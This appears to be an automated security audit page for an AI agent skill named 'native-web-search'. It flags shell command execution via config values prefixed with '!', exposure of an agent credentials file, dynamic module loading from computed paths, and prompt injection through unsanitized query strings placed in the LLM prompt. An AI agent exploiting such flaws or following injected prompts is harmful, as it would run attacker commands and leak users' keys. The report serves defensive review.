native-web-search
Fail
Audited by Gen Agent Trust Hub on Feb 27, 2026
Risk Level: HIGHCOMMAND_EXECUTIONCREDENTIALS_UNSAFEREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The function
resolveConfigValueinsearch.mjsutilizesexecSyncto execute shell commands if a configuration string starts with an exclamation mark (!). Since this function is used to resolve API keys from theauth.jsonfile, an attacker who can influence this file can achieve arbitrary command execution. - [CREDENTIALS_UNSAFE]: The script explicitly reads from and writes to
~/.pi/agent/auth.json. This file is known to contain sensitive authentication material, including long-lived API keys and OAuth refresh tokens for AI services. - [DYNAMIC_EXECUTION]: The
loadPiAifunction uses dynamicimport()to load the@mariozechner/pi-aimodule from computed paths. It searches through several locations including environment variables, parentnode_modulesdirectories (walking up 8 levels from the current working directory), and hardcoded development paths. This behavior can be exploited to execute malicious code if the script is run in a directory with a compromisednode_modulestree. - [INDIRECT_PROMPT_INJECTION]: The skill is vulnerable to prompt injection via user-controlled inputs.
- Ingestion points: The
queryandpurposevariables are read directly from command-line arguments (process.argv). - Boundary markers: No delimiters or instructions to ignore embedded commands are present in the
buildUserPromptfunction. - Capability inventory: The script has the capability to perform network requests via
fetch, execute shell commands viaexecSync, and write to the filesystem viawriteFileSync. - Sanitization: There is no sanitization or escaping of the
queryorpurposestrings before they are interpolated into the final prompt sent to the LLM.
Recommendations
- AI detected serious security threats
Audit Metadata